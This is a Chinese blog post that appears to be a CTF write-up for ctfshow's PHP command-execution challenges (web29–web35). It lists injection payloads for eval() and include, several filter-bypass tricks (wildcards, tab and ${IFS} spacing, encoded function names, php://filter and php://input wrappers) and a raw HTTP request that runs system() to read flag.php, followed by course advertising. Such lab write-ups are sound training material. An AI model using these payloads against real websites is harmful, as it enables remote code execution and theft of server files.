ctfshow-web-命令执行

于 2024-08-27 02:11:22 发布
阅读量791 收藏 17
点赞数 23
文章标签: 前端 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_86043875/article/details/141577043
版权

②内敛执行
?c=echo cat fl*;
?c=echo cat fl??.?hp;

③利用参数输入+eval
?c=eval($_GET[1]);&1=system(‘tac fla*’);

④利用参数输入+include+伪协议(不用括号、分号)
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
2. web30
过滤了php、flag、system
补充打印文件命令?c=echo%20nl%20fl%27%27ag.p%27%27hp;
3. web31
preg_match(“/flag|system|php|cat|sort|shell|.| |'/i”, $c)
其他的过滤了无所谓,但过滤了.和空格

①其实就是highlight_file(flag.php);的url编码,适用php7
?c=(%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(%99%93%9E%98%D1%8F%97%8F);

②通过嵌套eval函数来获取另一个参数的的方法来绕过,不会判断其他参数的传入
?c=eval($_GET[a]);&a=system(‘cat flag.php’);

③用函数绕
?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
?c=show_source(scandir(getcwd())[2]);

localeconv():返回包含本地化数字和货币格式信息的关联数组,这里主要是返回数组第一个"."
pos():输出数组第一个元素,不改变指针
scandir():遍历目录,这里因为参数为"."所以遍历当前目录
array_reverse():元组倒置
next():将数组指针指向下一个,这里可以省略倒置和改变数组指针,直接利用[2]取出数组也可以
show_source():查看源码
getcwd():获取当前工作目录

④绕空格
?c=passthru(“tac%09fla*”);
?c=passthru(“tac${IFS}$9fla*”);
中间拼接用%09
${IFS} 9 替换 , 不行就在第一个 9替换, 不行就在第一个 9替换,不行就在第一个转义试试
4. web33
多过滤了; 命令执行构造包含然后伪协议不用分号

if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);


include$\_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
  1. web34
    相比上题多过滤了冒号。
同上,秒了
  1. web35
    多了=和<,意思就是不让?>绕分号嘛,但是还是可以构造include秒了,试试POST方法的,需要伪协议input执行该POST请求。
GET /?c=include$\_GET[1]?>&1=php://input HTTP/1.1
Host: 8885362a-8593-4c47-8a66-49fc4ab85f9f.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 31

<?php system('tac flag.php');?>

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

详情docs.qq.com/doc/DSlhRRFFyU2pVZGhS

2401_86043875
关注
ctfshow-web入门-命令执行-web29
HkD01L的博客
06-21 330
ctfshow,命令执行web29
ctfshow-web入门-命令执行-web30
HkD01L的博客
06-21 285
ctfshow,命令执行,web30
CTFshow 命令执行web入门30-39
qzh3485535的博客
03-18 1536
查看源码后得到flag,以下还有以下试出来的别的payload.php');?????');为什么?可以成功绕过呢,因为cat命令可以接受一个通配符为参数,如果以??????为参数它就会匹配长度为4后缀为3的文件,而这其中包括了flag.php。
CTFshow 命令执行 web30
Kradress的博客
10-29 145
查看源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:42:26 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c']
ctfshow-命令执行-web30
weixin_43400535的博客
10-28 486
ctfshow-web30 题目描述: 原理: 同web29 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:42:26 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_r
CTFSHOW web入门——web30
m0_74093152的博客
04-23 268
passthru()函数同system()函数类似,都可以用来执行外部命令的,因此可以用passthru来代替system。因此构造payload:?把flag、system、php都给过滤了。查看页面源代码即可获得flag。
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 907
ctfshow,命令执行web31
ctfshow-web41~60-WP
02-21
目标是通过构建特定的payload来实现命令执行,并最终获取到flag。 #### 代码分析 首先,我们来看一下题目提供的PHP代码片段: ```php if(isset($_POST['c'])){ $c = $_POST['c']; if(!preg_match('/[0-9]|[a-z]...
ctfshow-web-命令执行,网络安全开发的基础知识
2401_83739727的博客
04-03 682
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
ctfshow-web入门-命令执行(web32-36)
HkD01L的博客
06-25 1085
ctfshow,web入门,命令执行,web32,web33,web34,web35,web36
Ctfshow web入门-web30 WP
qq_45427131的博客
05-13 1031
拿到url首先查看源码,发现源码对比上一题只是多了个对输入值system的过滤 preg_match函数过滤system函数,但是php中执行方法的函数有很多,比如passthru、exec,shell_exec等 ,注意exec对执行的结果不输出 passthru和system的作用是一样的,解题的姿势有很多,本文简述几种解题方式 解法一: 这里用exec执行函数,虽然exec对执行结果不输出,但是不代表不可以查看flag,这里用函数执行复制(将flag复制给1.txt,直接用浏览器访问1.txt),
ctfshow命令执行web30-39
m0_62584974的博客
04-05 1559
ctf的命令执行
ctfshow-web入门-命令执行web30-web36)
最新发布
Welcome To Myon'Blog !
06-06 1073
命令执行,需要严格的过滤。
ctfshow-web30(命令执行)
m0_62094846的博客
01-21 287
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:42:26 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])){..
CTFshow-Web30--45
2301_78260987的博客
07-13 224
大体意思就是从进行异或的字符中排除掉被过滤的,然后在判断异或得到的字符是否为可见字符。先通过以下php脚本生成一个rce_or.txt,内容是上述可用字符及编码。我们可以尝试从ascii为0-255的字符中,找到能够通过。到这一步其实就是用python主动提交payload。再通过以下自动化脚本传参并执行执行命令。可以如下图先运行php脚本先生成txt文件。不要被迷惑了,第一个等号是用来传参的。得到的可用字符及相应url编码。
CTFshow 命令执行web入门30-39(1)
2401_84297265的博客
05-16 240
查看源码后得到flag,以下还有以下试出来的别的payload.php’);????’);为什么?可以成功绕过呢,因为cat命令可以接受一个通配符为参数,如果以?????为参数它就会匹配长度为4后缀为3的文件,而这其中包括了flag.php。
《CTFshow-Web入门》03. Web 21~30
学习学习学习......
11-25 1564
用户名密码爆破、域名爆破、PHP 代码分析、PHP 伪随机数及其逆推、burpsuite 暴力破解、eval() 利用与正则绕过。
CTFshow 命令执行 web29 30 31
ChenD的学习笔记
11-08 1634
CTFshow 命令执行 web29 web30 web31
ctfshow-web-web红包题
07-14
如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值